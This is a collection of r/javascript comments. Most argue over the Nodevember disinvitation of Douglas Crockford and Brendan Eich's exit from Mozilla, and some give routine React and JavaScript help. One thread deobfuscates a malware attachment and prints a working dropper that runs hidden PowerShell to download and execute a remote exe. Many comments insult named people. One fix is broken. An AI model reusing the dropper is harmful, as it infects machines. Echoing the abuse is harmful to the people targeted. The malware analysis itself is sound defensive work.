I think it's you who misunderstand. Nobody questioned his right to support his political cause. He had every right. But if your political cause seeks to limit the freedoms of others that you yourself enjoy, then others have every right to shun you. He wasn't seeking some principle coding position, he was going to occupy the highest position at Mozilla. It takes much more than coding knowledge to fill that role. It takes leadership and charisma. He would've been the face of the company. A huge number of people may turn away from Firefox, potential employees may refuse to work their. Existing employees may feel Mozilla isn't the place for them, or they lack respect for their boss. All of these reasons disqualified him. Nobody has any obligation to treat people with discriminatory opinions with kid gloves and try to politely change their mind. If they can't change their own mind seeing the backlash that their bigotry has caused, then they can go fuck themselves. 
Ah, in that case yes I can see how frustrating that would be for the team.
OK, doing my best to follow you here. Utilizing that code doesn't produce errors but the icon fails to show up on the map. If I add a line below with the text: myButton.addTo(map) the icon will show up, I can click it, but I can't unclick it and remove the layer. 
Thumbs up for funfunfunction
Do you really not get it. It's you with the delicate sensibilities. It's you demanding that you're allowed to be an obnoxious fuck filled with hate for a random group of people and still be invited to do adult things with the grown ups. Because meh rights. No that's not what rights are.
You mean like Douglas Crockford who was publicly shamed and list a gig?
Not enforced, just a design decision. Twitter was designed to be used as a mass SMS tool a decade ago, but is mostly used through their app or web app these days. They've given up on the character limits in so many ways that SMS must barely work at this point. For instance usernames, urls, and embedded media don't count towards the character limit any more. Every once in a while Twitter threatens to kill the character limit entirely and the userbase complains, so they reverse course. They have this problem where the network stopped growing a long time ago, and none of the current users like any of their ideas to attract new users. 
I did read the posts, they had a bit of a nasty vibe to them, which is what made me get fed up and start saying "maybe the conference organisers can make their own decisions" on here.
&gt; don't feel that an hour is a long enough time to figure out if someone is a good long-term fit for you company both in terms of skill and personality. That's correct, but trial periods are still very rare, because you're limited to hiring people who don't already have a job AND really, really want to work for you. 
But if people democratically decide in favor of being jerks to minorities, it doesn't change the fact that they're being jerks to minorities. The point is not the legality of it. The point is to just not be a jerk to other people for nothing. 
&gt; No that's not what rights are. It is exactly what rights are... protections of government. https://en.wikipedia.org/wiki/Rights Since you don't know what rights are and seem content to confuse and interchange that term with liberty I am going to safely assume you also don't have any idea what liberty is (protections from government): * https://en.wikipedia.org/wiki/Liberty (summary) * http://www.utilitarianism.com/ol/one.html (authoritative thesis) **EDIT** In the case of US law most liberties are permitted by the first amendment to the US Constitution. The Constitution, the amendment, and the weight of law they carry are rights. The expressions permitted and protected by that right are the liberties. It was perceived violations of liberty in revolutionary times that motivated the creation of the Bill of Rights. Liberty is the foundation while rights are essential protections thereof. **EDIT EDIT** &gt; It's you with the delicate sensibilities. pwnd. You probably deteriorated into a slurred flaming waste because are you a delicate flower. You are the troll you sound like. Go spread your liberty-hating ignorance and sadness elsewhere.
Thats what you get when you allow for what is currently happening in JS community. People with little to no real knowledge bought some macbooks, bought some stickers, started to code JS bullshit, created absolutely useless conferences. Since when things like feminism and LGBTQ have anyhting to do with technology, WTF? Web development was always shitty and frowned upon, but instead trying to be at least a little bit professional about it its just getting worse every day.
I know that some people like to use const everywhere, but I don't really see the point. I have never encountered a bug which could have been prevented by an immutable binding. There just isn't any evidence. In Rust, it's the other way around. Immutable bindings are less to type. let x = 5; // immutable i32 x = 7; // error let mut y = 5; // mutable i32 y = 7; // fine If JS had block scope from the beginning, we could have used `let` for immutable bindings.
This is what happens when you let social justice warriors into your culture. It happens *everywhere*, all the time. Universities, SF, gaming, programming: everything they touch turns to shit. Stop letting them in, ffs.
When power and politics come into the equation, your community is not a campus anymore, it's an arena.
what? that's really a shame as I like his videos.
I work in this field. I know the people involved. I'm leftist. I'm pro equality in any aspect. Reading that hurts my brain: http://events.linuxfoundation.org/events/node-interactive-europe/attend/diversity-inclusion Kids ... just because you got your Marihuana prescription in California because you pretended to suffer from PTSD this does not mean that we need quiet rooms and communication stickers. And I have to find out which terrible things could happen that requires special 'incident training' for the staff. This ego-generation raised by helicopter parents that take themselves way too serious. These 20 year old "empathy" evangelists that will ruin your life and those of your wife and kids if you dare to disagree with their opinions. I deeply hate this first-world-problem-rich-kid movement that turns any real political engagement into a joke and ruins my industry. These people are one reason why Trump is on the rise. I was not always that 'radical' and anti-them but ... you know ... I have to vent my frustration here because ... you know ... if I said that publicly I would lose my job. I have family so I prefer to be a coward. But this shit has to stop NOW!
&gt;A campaign can't "stop marriage equality" Yes it can. Otherwise he wouldn't be giving money to it. Frankly this is such a pathetic argument that avoids the real issue and tries to hide behind the veil of free speech. Yes, he has a right to donate and participate in the democratic process, and he also deserves to face the consequences of doing so. I do not have to respect the opinions of bigots. Not all opinions are equal. 
Haha. It's always a bell curve. 
Making your own decision is fine initially. But once you start to get names at a certain tier of speaking level, you become accountable for your actions when managing them. You can't take a top-tier speaker like Crockford and do this to them, the community will want answers. For example, you as a Comic Convention don't get Stan Lee on the books then tell everyone, "Well, some people think he doesn't provide a good environment so he's out." There will be an uproar over that even with no other information given. And, *why* will get out eventually. Which then you need to deal with the fallout. This entire experience just shows how the organizers here are unprepared to operate and event at this level. They got big names and had no clue how to handle them. It is far different than running a small-time community thing without a large reach.
Nobody said there is a problem with currying as such. &gt; Even if you don't cede it's useful, *Nobody* said that!!! &gt; my team found currying a function quite useful when we were waiting for two async calls to resolve from two different parts of our app (such that a Promise.all wouldn't apply) I don't understand why you can't wait for the promise you got from another place. You have to have *something* from that other place in any case, may as well be the promise. I don't know the context of course, might have solved it just like you did - which brings us to your first sentence... :)
Incorrect. Someone of great value to the JavaScript community was publicly shamed and lost a gig over baseless claims. That is not "nothing of note."
Everything you just said is every bit as dumb as any stupid bullshit the SJWs spout.
Incorrect again. Publicly rescinding an invitation is not "exercising their right to invite who they like." They did that when they invited him. By inviting and then publicly shunning him they did potential harm to his character and didn't even offer a substantive reason for doing so. No one is denying that nodevember can uninvite him, people are outraged at how and why they did.
Oh really? pretty sure all of the crap you just said is bullshit. I'd love to see some science behind your statements though. 
I never thought about this from a request's perspective. Thanks!
It sets the (this) scope in the success and error callbacks to the component, allowing you to access the setState function and props object from inside those callbacks.
"MY" industry??? And who are you to say who WE are and what WE like? Get over yourself. I don't like the industry taken over by pro- or anti- SJW crusades. Is that ok? He's just a bloke who got uninvited from a conference, happens all the times. Enough with the pointless drama. 
I would argue that people haven't taken these issues seriously enough in the past and so that's why we are at a point where random hearsay and baseless claims hold water.
Three for three on being incorrect. From their statement at http://nodevember.org/statement.html "we became aware that based on private feedback." The definition of hearsay: "information received from other people that one cannot adequately substantiate; rumor."
... 2004, not late 2014. 
yep, typo/brain fart, fixed
Ask Hans Reiser :-) We're all someone else's asshole anyway, and who knows if people with power really see that situation as a problem, more of an opportunity. 
&gt;I still refuse to speak at events he's speaking at Oh, what a huge loss! /s Too bad Crockford can't speak at every event everywhere.
Do you want to lose your job simply because someone accused you of something patently false without any evidence? No? Well, there's your answer.
None of the things I said are incorrect, a rumour is just unsubstantiated gossip, being told directly by someone present about something is not hearsay. Now if you want to carry on scoring imaginary points you can carry on by yourself 
Nice find. This is the same person in the blog post and video, right? Blatant hypocrisy.
False equivalency. One of these harms no one else (sex), one of these does (donating to prevent gay marriage).
True, but it does not. I kinda hate how const x doesn't align with if (x) like var/let do but here we are.
Would you like to check for me?
If I'm barely skimming this bs correctly he didn't lose his job he got uninvited to a conference that is *totally lame anyways*.
Ditto. Dealing with this childish community is now the worst part of my job.
I certainly won't donate to an organization run by Eich.
&gt;Menawhile hundreds of neckbeards just use it as a chance to vent about so-called SJW Fucking exactly. Ironically this whole donkey show is just vocal minority trying to get their way by whining about something they don't like that effects almost nobody. Going to avoid this sub until the gamergate leakage dries up.
The `success` and `error` functions are both using the `this` keyword. However, that's one of Javascript's trickiest aspects. The intent is that `this` should refer to the React component instance, but out of the box, `this` inside the callback functions won't be the component instance. The callbacks need to be wrapped up using `bind` to ensure that `this` correctly refers to the component. Some useful articles on the topic: http://reactkungfu.com/2015/07/why-and-how-to-bind-methods-in-your-react-component-classes/ and https://medium.com/@housecor/react-binding-patterns-5-approaches-for-handling-this-92c651b5af56 , and several others listed at https://github.com/markerikson/react-redux-links/blob/master/using-react-with-es6.md .
Disinviting DC based largely on one person's opinion, even if that person was another speaker at the event was wrong. Answering with baseless claims that DC had made sexist or insensitive comments, when confronted about their decision was double wrong, and well deserving of the public backlash they've received. However the idea that this is a SJW conspiracy or that SJW's are ruining the javascript community has no basis in fact. In all these stories there is only a couple dozen people who actually appear to have supported the decision. And none of them are of significant note. To me the asymmetric response of the anti-PC crowd to this seems to indicate to me that they are the more immediately problematic faction in the JS community.
Can you paste your code here?
Probably it is. Are you refuting that male and female traits coesists in every person? I don't have any study to bake what I said, but I am pretty sure that science cannot (and should not) explain everything.
&gt; We cant let some women ruin someones image with lies You seriously couldn't think of a better way to phrase that?
http://imgur.com/a/UkChR
What a great ambassador for Netflix.
Either you put replied to the wrong comment or you don't know what an SJW is
Just remember, you were witch hunting.
Sorry bud, I think you're long past reasoning with.
I love when she comments about "diversity vs. programming skill" on open source and the "ridiculousness of a meritocracy". Why does she think that the color of the skin of a programmer makes a product better? Obviously, I think diversity in general is something to be encouraged, but if someone knows how to write clean, testable code that scales and ships well, their code is going to be used over some else's, no matter each person's skin color. And meritocracy is definitely a thing, and is probably more egalitarian than her ideas; of course, it seems her ideas are rooted in the ultra-SJW mentality of retribution, not equality.
I like this subreddit and would like to remind people of several things: 1. Doug Crockford's reputation is going to be just fine. I think no differently about him than I did a week ago or a year ago. I have talked to many people about this and _none_ of them told me, “you know, I really liked Crockford until this thing happened, and now I’m not so sure.” He will continue to speak at conferences. 2. Third-hand Twitter research in the midst of a furor is just about the least reliable source we have, and if you're getting angry based on such evidence then you're just wasting energy. 3. You can think that this situation sucks _without_ (a) tweeting angry words at someone you think is the enemy; (b) doing a Two Minutes' Hate on a discussion thread; (c) casting it as a battle in some sort of culture war. Most things that we think are Absolute Travesties happen not because someone is evil but rather because they're humans in a messy world. 4. Rage is impotent unless it translates to action. If you can't channel your anger into a concrete response — not attending this conference, starting your own conference, whatever — then you're just engaging in intellectual masturbation, like reading an Ann Coulter book.
Is "text" supposed to be an array or a string? The problem may be that it's expecting a string but you're sending an array. If you want to combine the array into a single string, you can use list.join("separator")
&gt; he got uninvited to a conference that is totally lame anyways Oh well, that's ok then. As long as people aren't being baselessly and publicly slandered and hounded out of invitations to speak at *cool* conferences on the say-so of a handful of crybaby social media bullies, it's all just peachy-keen. :-p
Actually, this is quite unfair, the "PC crowd" was able to accomplish their goal with a single tweet so there's no need for further response, they already got what they want.
Having worked as both a speaker and organizer of conferences and events in Web technologies since 1997, I have had almost two decades of observing and working to diversify not only events but our industry at large. In that time I had opportunity to interact with Douglas Crockford on more occasions than I can remember. What I do remember clearly is how much Douglas Crockford impressed me with his work on JSON, his well-known talk(s) on "Quality" and innumerable positive actions to the Javascript language and its varied communities. Did I ever feel him to give off odd vibes? Without question. But not in any way that was negative or threatening. Socially different. Awkward, fish out of water, as if he were uncomfortable in his own skin. As this is not atypical in our industry, I chalked it up to social awkwardness all around. Stepping back to examine the panoramic view of that near 20 years of observation, what I see and the conclusion I've arrived at is that Douglas Crockford is an extremely diverse human being. Specifically? Neurodiverse. Anyone who absorbs and processes information at high speeds (and almost everyone reading this likely falls into this category) is bound to have some form of what we're now calling "spectrum disorders." Personally, I don't think they are disorders, preferring the term "difference." Diversity means variety. More plainly? Difference! Did someone break the law? If so, we must report the crime or we leave others vulnerable. If no law was broken and we are just of a different opinion, how about we use the power of choice and not attend the conference? Even better, we can choose cooperative behavior by not attending that talk or ensuring we are with other companions at social gatherings, leaving others who do not feel the same discomfort to gain from the experience. Open web is Open. Backchanneling is bullshit. Covert operations are an especially heinous form of social engineering in an environment where cooperation and communication are key factors. Let's not make the mistake of thinking the Web is not a social creation. We need only refer to its inventor Tim Berners-Lee for the precise truth about the core ideals of the web. Given that, we have as much responsibility to ensure our society is celebrated and not degraded as well as keeping our technology pursuits to a standard of quality. Let's ask ourselves again: WHAT IS DIVERSITY? Variety. Difference. The world is an uncomfortable place. It behooves all humanity to learn to deal with that discomfort more effectively than resorting to our childhood temper tantrums. Let's lift it up a bit - be better than our last stable build and realize that diversity includes the people who might be our polar opposites in the way he, she, they, it, etc. approach the world. My personal beliefs conflict with Brendan Eich's but does that for a moment make me not capable of accepting that his work has changed the very course of my career? Douglas Crockford is the same for me. Not everyone is going to come in the color, shape, gender, size, religion, clothes, fashion, approach or what have you that is going to please us all of the time. It's a mathematical improbability that one person will ever please all people. Let's learn how to receive information and learning that is incredibly valuable from a world of differences, many which will make us uncomfortable. Let's take that gift and not bite the hand who gives it. If we want to change the world, we can do that too - and the path to that isn't by committing an act of attempted professional homicide. Quite the opposite. Diversity means difference. Check ourselves, please. These ridiculous controversies are points of FAIL and we don't need them, they get in the way of efficiency and quality. Broken laws go to the authorities. Social behavior is OURS to manage. So let's manage ours more kindly, please? Molly Molly E. Holzschlag author * speaker * webdev Developer Relations, Vivaldi Browser With a sincere thank you to Paul Straw for the informative article. 
I have never understood this view of blocking. Blocking is not a tool that someone else uses to insult you or call you a jerk. It's something they do so that they can filter out their timeline and their mentions for whatever reason. Consider that the sentiment was not "I will not tolerate dissent" but more like "I've had this argument 50 times already and it's gone nowhere, so I'm nipping this in the bud."
&gt; cuckvember See, this is the problem. You can't even criticise really outrageous behaviour by dipshit lunatic "Tumblr feminist" extremists on Twitter without the dipshit extremists on the other side getting involved and handing the first set of dipshits a free excuse to dismiss all the criticism they're rightfully getting.
Sorry you're getting some downvotes. Got an up from me. I agree that it's their conference and they can do what they want, prioritize what they want, and what constitutes "due" will vary case by case, but Crockford wasn't in some clear violation of their code of conduct so as to be flat out dismissed and they didn't even discuss it internally, and one of the organizers didn't even find out until after it had been done, and they quit over it, which seems like enough for me to disqualify what happened for any definition of due diligence.
Evolutionary psych has a hard time of making falsifiable claims. There was a paper "gentleman prefer blondes" that was a hoax that majorly made way through EvPsy circles. Claiming evolutionary psychology equal to evolution is laughably sad.
CONTENT WARNING: sarcasm, shitpost &gt; nobody cares what you identify as or what you do outside of coding, only the code counts But didn't you hear her??? Node is not going to be a meritocracy, because her and her "inclusivity board" determined so! Why does it matter if Person A can code better than Person B if Person B is brown? And if Person C is a half-Asian half-Latina trans-gender pansexualite, then they get to be hired over Person B, even if they only know `document.write('hello world!');`. After all, the more diverse the team, the better the product, **no questions asked**.
That's what I thought. 
They definitely don't sound like software engineers to me. More like junior devs who excel at self branding (or in this case fail at it). 
JS is particularly susceptible to this type of bug regardless of whether you use currying or not. Just like if you were or weren't using currying, JS forces you to have to read the function definition and check the arity/arguments of it. This isn't a valid point against currying.
this is basic javascript, if `.bind` is unfamiliar to you, then you should brush on how context works generally before trying to learn a framework. understanding context will be important if you want to learn React. MDN covers all the quirks of `this` in detail, including the use of call, bind and apply: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/this you might want to also look up es6 and arrow functions, because they provide another, imo, easier to understand way of preserving context
I would argue that despite your intentions here, novels like this are harming this community (at least this specific reddit one) more than anything. Largely because it has nothing to do with javascript.
You don't have to, but you are wrong. Their initial argument doesn't hold up to scrutiny so they've shut up and closed all dialog because they have literally nothing to gain.
It's OK to ignore people who exhibit negative social tendencies. Not everything needs a lengthy rant.
Yep, some people are really stretching to turn everything into a culture war. 
Curious what the point of this post is (maybe missing the joke).
I don't really consider myself a developer, but I feel like the hypersensitive types are the ones ruining everything they get involved in. It's like a scope creep, where the scope is "just be nice" and it gets expanded to "bend over backwards". I may not agree with Linus Torvalds on everything he thinks, but I'm kinda glad he's still a jerk just because it proves there's still some leeway for criticism. I get wanting to feel included, but not when that inclusiveness means blanket censorship.
Are you talking to yourself? Where am I arguing that it's a right? I'm arguing exactly the opposite. 
I stated a fact, I didn't pick up my pitchfork
Preach the truth - I brought this same thing up the other day regarding this same topic. It's disgraceful to those involved with forcing Eich out of Mozilla that they can't even see the hypocrisy of their own actions. Eich made a personal donation with personal money for a socio-political cause that he had an opinion on. He was quite literally operating within the system of government and freedom granted to him as a US citizen. There was nothing violent about his actions nor did he have any history of treating employees differently based on their gender/sexual-orientation. They raged up a shit storm in social media to force out someone who held views and ideals different from their own ... under the pretense that they felt they *could* be treated differently or forced out in the future due to Eich's personal stance on marriage rights. It's so ass backwards on his opponents behalf it's insane; All things aside he was more than qualified for the job and had no signs of bias within the workplace towards his employees.
Your question has been answered by the others but wanted to provide another resource: https://github.com/getify/You-Dont-Know-JS, its not react specific but the author gives a very high to low level view of javascript as a language vs framework specifics. Highly recommend. 
Judging by her website http://nodebotani.st/ she couldn't finish CodeCademy...
change showAllTiles() { var that = this setTimeout(() =&gt; { debugger for (var i = 0; i &lt; SIZE * SIZE; i++) { for (var j = 0; j &lt; SIZE * SIZE; j++) { this.initialSingleTileRender(i) } } }, 500); } to showAllTiles() { setTimeout(() =&gt; { debugger for (var i = 0; i &lt; SIZE * SIZE; i++) { for (var j = 0; j &lt; SIZE * SIZE; j++) { this.initialSingleTileRender(i) } } }, 500).bind(this); }
It's not so much a problem as it is noise. It's pretty easy to filter out both sides
Hahaha fuck. Just threw this out there to test the waters, rile everyone and entertain myself. Everything worked out.
The average US internet speed as of 2014 is 33Mbps. That's 4125kb per second. This means you can download Moment.js 219 times in 1 second, or once at 4.5ms. So, who cares? No one. No one should care about risking the load of moment.js in 2016. Now if we travel back to 1995, where websites were 10-20kb, then someone may want to opt for timeago.js. Do you plan on time-traveling anytime soon?
More than *anything?* Really? Ouch. Well, that would be a useful and legitimate use of a down-vote. You're familiar with the context, can probably construct the counter argument yourself, and your position has been consistent.
Their concrete response is bitching on social media and boycotting an event they were never going to attend 
I really meant what difference does it make -&gt; "in this case". I don't think which one he was, makes any difference to what was said.
Yep, that's my experience with him exactly. I think it's really weird for him to stick his neck out on such a tenuous argument. If I had 26K followers I'd try not to alienate &gt;80% of them. https://twitter.com/getify/status/772886283244937216 And this asshat: https://twitter.com/raganwald/status/772761472606674944. Nobody talks about /r/javascript like that! You hear me? Nobody!
&gt; But first, bring it up with her. Been there, done that. That made it unbearably tense for about 3 weeks straight. We're actually pretty convinced at this point that this girl suffers from a VERY pronounced narcissistic personality. If you go to the DSM and read the description, point for point literally EVERY last diagnostic bullet point is there (and quite obvious too). And yes, inferiority is a very big part of narcissism, and hers is immensely obvious and hilariously easy to provoke. &gt; write out everything that has been bothering you as a letter addressed to her, just venting I do plenty of venting already. Trust me, I've got that covered :) My drafts folder has about 30 unsent emails to her alone. Things won't work out. This is cultural. It's deeply ingrained in the company's values. She'll win this one, and I'll lose. I'm quite sure. I just need to hold on long enough to finish out the year and collect my stock options. Then I'm gone. This is the worst company I've ever worked for in my entire life. Bunch of psychopaths.
Yeah, I'll conceed it is technically recursive. It's just not a sensible position to take from the 2nd one on down... even ignoring the length of it.
Yeah I didn't bother even downvoting or upvoting you, just gave you my 2c. I read your petulant diatribe and didn't say anything about it other than the obvious in that this has nothing to do with this sub. Now you're coming off as a dick to be fair, so prattle back to twitter with it and move on.
Some of us warned this would happen when code of conduct became more important than, you know, code.
 It don't you see, that is what she brings to the community and we should thank her for that.
Crockford is a crazy smart programmer and computer scientist, and has been incredibly influential. The thing is, you can still be a smart influential asshole - and I can understand people not wanting to invite people who are difficult to work with to their events. That being said, I'm not familiar enough with the specifics of why Crockford was uninvited, so I can't judge whether it was an overreaction or not.
Okay, but I'm confused by what you're saying. As far as I can see, I responded politely to you, and in return your language has become insulting. What was offensive to you about what I just said?
I would like you to take the time to meditate on why you are so very angry — angrier than even Doug Crockford seems to be about this. I want you to read your comments tomorrow and imagine how this would come off to you if it were written by someone else. Kassandra has been writing JavaScript for years. She's spoken at several conferences. At least two members of TC39 would vouch for her expertise. I wonder why you think that being an "SJW" means that someone can't code. I almost wish Kas was trolling; _actual trolls_ don't get people as caremad as this.
Please don't make the mistake of thinking people who are arseholes can't be programmers. I can verify they can be and are capable of worse. 
Hmm. I wish that I could find these places where people get the boot for insulting people in real life. I've worked on technical teams for over 10 years and I've seen people do and say things that would be way beyond the offensiveness that people are so upset about. Nothing happened to them. They kept their jobs, in fact, I think some of the worst offenses I've seen in my career did nothing to hinder the eventual promotions of said people. Sure, HR *says* it's all against company policy, but they're just paying lip service. The thing is companies that know they need to get shit done don't him and haw over every little infraction because at the end of the day, it's about contribution.
Not only that but he not only specifically made sure his employees had those same rights, he simply wanted a different term used to define the civil union between two people.
It certainly doesn't mean they can't can't code, but it almost always means that code or other topical discussion takes a backseat to politics during their talks. If nothing else people should take note of their names so they don't accidently attend political talks over something more apropos.
It's because *usually* those people are "asked to resign." I've seen it happen a handful of times, but I do know of one person specifically who was outright fired because he was such a prick to people.
Not to those that supported it because it allows them to demonize you as evil.
I hope Crockford doesn't let these SJWs get him down. He's a hero in the JS community.
Damn. Maybe it's my area and the culture that exists here but I've worked 4 different development jobs in the last 10 years and at each one there was a clique of pricks and absolutely nothing was done about it, no matter how much people complained. I chalk it up to entrenched cronyism. I'm not saying that people should have to suffer in a blatantly toxic environment, but on the whole, people are generally way too sensitive these days. I'm certainly not the only one who thinks so.
This is actually very useful thanks.
Thanks man. Epic tutorial. Was much easier to understand than anything I've tried before - now it's time to move onto my first real project!
It's not just JS it's all the STEM fields.
Wait wait, I am absolutely not up to speed here. So there was this Nodevember conference and they dis-invited Crockford and after that got a lot of hate and shut the entire thing down. Is that what happened?
Coddling.
Oh good. When I saw the title of this thread I was worried it might be an obituary.... Phew!
I've love to hear about this. I've been feeling pretty unwelcome at most conferences because of this, and the one I alluded to in my [big comment elsewhere in this thread](https://www.reddit.com/r/javascript/comments/50u77r/douglas_crockford_removed_as_a_keynote_speaker_at/d78mvfx0) was so refreshingly devoid of bullshit drama. What conferences would you suggest?
if only there was some kind of permanent record of things that have happened on the web already and some way to provide people a way to access that record. maybe like, a clickable bit of text that provides a link between the current document the one you want to share. so that if tolerance and discussion are so important but they're tired of the argument, they could just show the person making the argument the previous discussion. but since we don't have any kind of linking and archiving mechanism, i guess blocking is the best way to handle things.
nope. that's *your* standard for not being a bad person. i don't agree with a lot of what you've said makes someone a bad person.
Oh no. However shall we survive?
Lambdajam, Brisbane. Anything organised by YOW!
That would be a wonderful solution if the speakers were upfront with the content of their talk, which they are not. Even in the extended descriptions.
... and your point is?
without even looking at it... It is downloading some other malware, most likely some ransomware installer, and trying to run it.
You get a pretty good idea by just reading the words that were poorly obfuscated.
Yeah thats what i assumed it would do - Im a bit worried that Bitdefender doesnt pick it up though, but hopefully it would pickup whatever it downloaded. The laptop ran it on didnt have any internet at the time, i was hoping for an exact link it was trying to get something from.
Is there any way to tell exactly what it was doing / where it was trying to download something from?
There are various linting and intellisense plugins for the different editors, but yes in general people tend to use plain editors rather than IDEs. 
[removed]
[removed]
I don't see how that is relevant
Yes but is it important bullshit, or bullshit we should give a shit about? I don't think so.
It looks like you've made a slight error converting it to the text file (or maybe the payload is malformed from the start), there is a .replace() call with parameters that don't make sense. Anyway, the code you have is trying to eval() the following: Note: **don't run this code on your machine** var cTWIUyw = new ActiveXObject("sheLl.aPpliCaTIon"); //ohRqmvJkbLErcFIfQNPHAKXaMDnzyuewUGSxYTlgBtsWdCVjZiWILcXmhKGuBesfvgPiyrxYMOFkzdonDbQpZVTqHRwJAtSjEUlNRDirswWKNOTcaPGlkYZjVdqnUJvEeFmLIXMAfSHxCgBhbtzouyRSlDsLEQmMJYGzXcOfkuCThnaoNgZjKrWvyFtxBPApbdwViqIULxVBRnAkGewrWhqdEcvYzouZfXyHMjDISJgUlFmTPiNQKCsbaO var gGeMlbk = "CMd.EXe"; var rUicRHz = "/C p^iNg L^OcAlh^Ost &amp; poWeRsheLl.EXE -eXecUTiO^npO^LICy bypAsS -^Nop^rOF^ile -winDOwst^Yle hI^Dden (N^eW-obj^ect s^ys^tem^.nEt.^webcl^iE^nt)^.dow^N^L^oA^d^F^ile('ht^tp:/^/8^9^.^1^08.^125.4^2/d^ow^n^lo^ad^.^php','%Appdata%brW14.Exe'^); stArt-PRoc^Ess '%appData%brW14.Exe'"; if (new Date()['getYear']()==new Array('2016')[0]) { cTWIUyw.ShellExecute(gGeMlbk, rUicRHz, "", "open", 0); } var dDJPwXb = "idUBNGbYoyWKOAnPuTcMXsHEfFSJVLrzDlgemxCRQpZIjkvtha"; which basically boils down to executing this command: Note: **don't run this code on your machine** piNg LOcAlhOst &amp; poWeRsheLl.EXE -eXecUTiOnpOLICy bypAsS -NoprOFile -winDOwstYle hIDden (NeW-object system.nEt.webcliEnt).dowNLoAdFile('http://89.108.125.42/download.php','%Appdata%brW14.Exe'); stArt-PRocEss '%appData%brW14.Exe' in your windows powershell if current year is 2016, which downloads and runs an executable from a remote server. This javascript is just a dropper script, the real payload (which hopefully will be picked up by your antivirus) is coming from that 89.108.125.42 server. 
And if one wasn't keen on implicit returns, another approach would just add the word return before the single line you have there. No need for the 'if' either way
could be `includes(term)` instead of `indexOf(term) !== -1`
So, assuming that string is `s`, we can decode it [mostly] with: decodeURIComponent(s.replace(/:/g, '%')) Note: it would be a lot easier if we could simply translate it with [hex escape sequences](https://mathiasbynens.be/notes/javascript-escapes) (`\x20` for space, etc.), but for some it's not wanting to let me do that. Anyways, we now have [this](http://pastebin.com/YyKKhiGv), and cleaning it up a little, we get [this](http://pastebin.com/kDEWG26H). Since `^` is ignored on the Windows CLI, we'll strip those out. I'll also normalize cApitAliZaTioN, rename some vars... var appshell = new ActiveXObject("Shell.Application"); var exe = "cmd.exe"; var args = "/C ping localhost &amp; powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://89.108.125.42/download.php','%AppData%brw14.exe'); start-process '%AppData%brw14.exe'"; if (new Date()['getYear']()==new Array('20'+'16')[0]) { appshell.ShellExecute(exe, args, "", "open", 0); } var dDJPwXb = "idUBNGbYoyWKOAnPuTcMXsHEfFSJVLrzDlgemxCRQpZIjkvtha"; So it opens a `cmd.exe`, which invokes a hidden powershell process to download a file from 89.108.125.42, saving it as`%AppData%brw14.exe`, and then invoking that file. I'm not sure what the purpose of the ping is, but the `/C` tells it to close the cmd.exe when done. Oh yeah, it only does this if the year is 2016, lol. And it appears that the payload is incomplete, since `dDJPwXb` is declared but never referenced, and I don't recognize the encoding there.
~~It doesnt seem to work.~~ ~~Im running it on a machine using my 4G phone net - Nothing to stop it downloading.~~ It does run the CMD and Powershell processes ~~but theres nothing in %appdata%~~ Edit: Scratch that - Bitdefender blocked it right away without any notification. Might disable it and see what it does.
Damn this was wrenching, I've been interviewing and don't even know a quarter of what this guy knows and I've been interviewing for 6 months.
Have you given TS a try? You might be pleasantly surprised at the capabilities, community, and tooling.
Can you provide a tutorial link or sample code? Would be really helpful.
That's true. Thank you for the reminder. 
Use fat arrows, they autobind 'this': componentDidMount() { $.ajax({ .. success: data =&gt; this.setState({data: data}) error: (xhr, status, err) =&gt; console.error(this.props.url, status, err.toString()) That would already work. For React in general i use fat-arrows and [class-properties](https://babeljs.io/docs/plugins/transform-class-properties/). I wouldn't use Jquery in favour of ES6, fetch and async/await handling the promises. class Component extends React.Component { async componentDidMount() { try { let res = await fetch(this.props.url); let data = await res.json(); this.setState({ data }); } catch(err) { console.error(this.props.url, status, err.toString()); } } click = () =&gt; { // 'this' points to the component instance console.log(this); } render() { return &lt;div onClick={this.click} /&gt;; } }
Yeah man, it's a tad over engineered in places I think but very cool and fast to get going
So, as an update. I have successfully utilized the EasyButton plugin and understand now how to use plugins generally within javascript code. My current holdup on finishing this project is creating a button that I can press to turn layers on and off. I have a group layer called "classes". This is my code: var layerState = false; var myButton = L.easyButton('fa-pencil', function() { if (layerState) { for (let i = 0; i &lt; classes.length; i++) { map.removeLayer(classes[i]); } } else { classes.addTo(map); } layerState = !layerState; }); classes.addTo(map); 
var is not dead, but I don't see any reason for choosing it over const/let. They both have restrictions which clearly communicate my intention to the reader. Why would anyone want to hide this information from the reader by choosing var instead? Only an asshole would do that.
If you use `node version 6.3 ( or higher )` you can just start the project like you usually do but with the inspect flag. So if you usually start the app with `node index.js` You should do : `node --inspect index.js` and it will give you a link which when posted in chrome will provide you the debugger. Happy debugging. 
Just to understand your point of view, do you consider non-straight people sick or wrong?
I'm the author of timeago.js. very sorry to cause controversy. @nonagonx @Fs0i I'am a Chinese, the bandwidth can not be compared with US, but this is the secondary reason. Our frontend development has rich client dev trending, I have a project using react, and the js file immediately reached 5 mb (only 1.x mb after uglify ^_^), we used so many libraries and components, each library has so many unbridled dependences, maybe it only depend on one of the several methods. @Khdoop The website http://timeago.org pointed to *China IP*, so can not be reached, yesterday I move it to **Github gh-pages**. My Github: https://github.com/hustcc , a front-end develop starter, Game QA. English is pool, hope to be able to understand. 
Moved to Github gh-page, is it OK?
Nice, didn't know that! Thanks!
Ping is just a 4-second-sleep. Rather common trick.
Neither.
Fair enough. I would have clarified; "Douglas Crockford, 'Java Script' expert". I shall restore my pointless downvote and compensate for the misunderstanding with an upvote!
Makes me rage when companies use it for customer support.
The example looks good, though my machine cant seem to make it work, the server.js is not getting fed through babel before running which is slowing me down &gt;=/ I'll try the important parts you left here anyway, this is helpful!
Some heckled Nodevember. It started with them "boycotting" over hiring too many white men. That wasn't enough, so a manifesto was written in which Crockford was branded a sexist and misogynist, of course without evidence. Nodevember bit, flagged him publicly and kept citing the accusers. When confronted they scrambled for evidence and found one of his conferences titled "monads and *gonads*," which warranted it for them. The ones that started it have a history. One has pulled such stunts before to the point of constructing false evidence sent to employers to get people fired. The other has an axe to grind. She'll talk at Nodevember instead of Crockford now, mission accomplished.
Another vote for Stripe - they make it *very* easy for you to integrate. Worth repeating: don't roll your own, and don't store credit card details.
&gt; var is not dead, but I don't see any reason for choosing it over const/let. Performance - due to temporary dead zone `let` access is much in most of cases. Because of that, I enforce policy of using `const` 99% of time and `var` only for certain loops (and only because tail recursion can fail in these cases).
